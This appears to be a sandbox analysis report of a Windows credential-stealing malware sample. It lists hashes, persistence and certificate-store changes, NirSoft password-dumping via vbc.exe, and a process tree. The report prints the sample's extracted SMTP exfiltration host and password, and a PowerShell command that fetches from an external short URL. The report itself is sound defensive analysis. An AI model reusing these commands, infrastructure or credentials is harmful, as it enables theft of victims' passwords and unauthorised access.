Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
24-07-2022 01:43
Static task
static1
Behavioral task
behavioral1
Sample
5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
Resource
win10v2004-20220721-en
General
-
Target
5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe
-
Size
912KB
-
MD5
598843804e5c6c64eba09b9cd08bfd9d
-
SHA1
213f93a0b4c73e5b8368e375dd0e89b053f9bcf5
-
SHA256
5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f
-
SHA512
0538d5c57ed42976b037bcfad36e42fe13b3aa98a57b7dd0b32006b0d589a72c48fc05daba12a11358a42dd86d9ceccca22b38e9bcad9c0a728c72a303e68046
Malware Config
Extracted
Protocol: smtp- Host:
smtp.vivaldi.net - Port:
587 - Username:
[email protected] - Password:
nAMkXP8FUGvSc3wjPCKF
Signatures
-
NirSoft MailPassView 5 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/1352-79-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral1/memory/1352-80-0x0000000000411654-mapping.dmp MailPassView behavioral1/memory/1352-83-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral1/memory/1352-85-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral1/memory/1352-86-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 5 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/1632-88-0x0000000000442628-mapping.dmp WebBrowserPassView behavioral1/memory/1632-87-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral1/memory/1632-91-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral1/memory/1632-92-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral1/memory/1632-94-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView -
Nirsoft 10 IoCs
resource yara_rule behavioral1/memory/1352-79-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral1/memory/1352-80-0x0000000000411654-mapping.dmp Nirsoft behavioral1/memory/1352-83-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral1/memory/1352-85-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral1/memory/1352-86-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral1/memory/1632-88-0x0000000000442628-mapping.dmp Nirsoft behavioral1/memory/1632-87-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral1/memory/1632-91-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral1/memory/1632-92-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral1/memory/1632-94-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft -
Executes dropped EXE 2 IoCs
pid Process 1356 Chrome.exe 2000 Windows Update.exe -
Loads dropped DLL 2 IoCs
pid Process 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 1356 Chrome.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4084403625-2215941253-1760665084-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts vbc.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4084403625-2215941253-1760665084-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" Windows Update.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 whatismyipaddress.com 5 whatismyipaddress.com 6 whatismyipaddress.com -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2000 set thread context of 1352 2000 Windows Update.exe 33 PID 2000 set thread context of 1632 2000 Windows Update.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Windows Update.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Windows Update.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Windows Update.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Windows Update.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Windows Update.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Windows Update.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1008 powershell.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe 2000 Windows Update.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1356 Chrome.exe Token: SeDebugPrivilege 1008 powershell.exe Token: SeDebugPrivilege 2000 Windows Update.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1684 wrote to memory of 1356 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 27 PID 1684 wrote to memory of 1356 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 27 PID 1684 wrote to memory of 1356 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 27 PID 1684 wrote to memory of 1356 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 27 PID 1684 wrote to memory of 1456 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 28 PID 1684 wrote to memory of 1456 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 28 PID 1684 wrote to memory of 1456 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 28 PID 1684 wrote to memory of 1456 1684 5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe 28 PID 1456 wrote to memory of 1008 1456 WScript.exe 30 PID 1456 wrote to memory of 1008 1456 WScript.exe 30 PID 1456 wrote to memory of 1008 1456 WScript.exe 30 PID 1456 wrote to memory of 1008 1456 WScript.exe 30 PID 1356 wrote to memory of 2000 1356 Chrome.exe 32 PID 1356 wrote to memory of 2000 1356 Chrome.exe 32 PID 1356 wrote to memory of 2000 1356 Chrome.exe 32 PID 1356 wrote to memory of 2000 1356 Chrome.exe 32 PID 1356 wrote to memory of 2000 1356 Chrome.exe 32 PID 1356 wrote to memory of 2000 1356 Chrome.exe 32 PID 1356 wrote to memory of 2000 1356 Chrome.exe 32 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1352 2000 Windows Update.exe 33 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34 PID 2000 wrote to memory of 1632 2000 Windows Update.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe"C:\Users\Admin\AppData\Local\Temp\5a26755f58c6941b7a271ff806ede5fc2a952b575187643ecddecb40becc478f.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\Chrome.exe"C:\Users\Admin\AppData\Local\Temp\Chrome.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Roaming\Windows Update.exe"C:\Users\Admin\AppData\Roaming\Windows Update.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"4⤵
- Accesses Microsoft Outlook accounts
PID:1352
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"4⤵PID:1632
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\s7.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -command "iwr -uri https://2no.co/2Appw5"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
-
Filesize
44B
MD59adcd38d352368d85ae6dc22cd2393ec
SHA1608f7f4ddd5547b537b1a3075a12a11ff03bdd82
SHA2562fa2cf15eacef5258245ba5f331cfd8286547cca36babb479e46deb0b9000408
SHA512b3eab8af2d965a158abcf385c4ff386ff170214779ba29976e21f2044f0fc2ee16766e4496cd0ffe21fed789aaad91e0ff27ff0fad16bd51e5b19b1332508d28
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
29KB
MD546ea1b5552e77fbc7679f93124754c57
SHA139cbbdba52ccacd8f874c7afac32b712c2e5bff9
SHA25654a60ce0810b7b0d3e2ab1a9f9f51752d7573a694ec7c1c252a907fb3117bca5
SHA512ac9f19f3314ec3f1c71d4e4681de52102d33110ed4f662b3e2c2a4577f66581d3ba43577ad5ff4ba557145afbf97aa4daec825f57bc9cfda4efd335530d6cb70
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed
-
Filesize
640KB
MD5ceb41183c47cfdfc02f2f823f59345a4
SHA1a8ce2f8b8912e5d59653af4e426e8ddd92823e1e
SHA256338b52b52f0352a2c543b60ead3e80767bd32d44fc5dee050fef4a703ce58fc0
SHA5126ce3b9e1712023cdacb1b23f15ed9ff634c93c95b7d05f4c86e38cd06db8aa7b818f49e607ddbe11bb588af9b996f9daa7b7f2cb31b67ab6067429d95c6efbed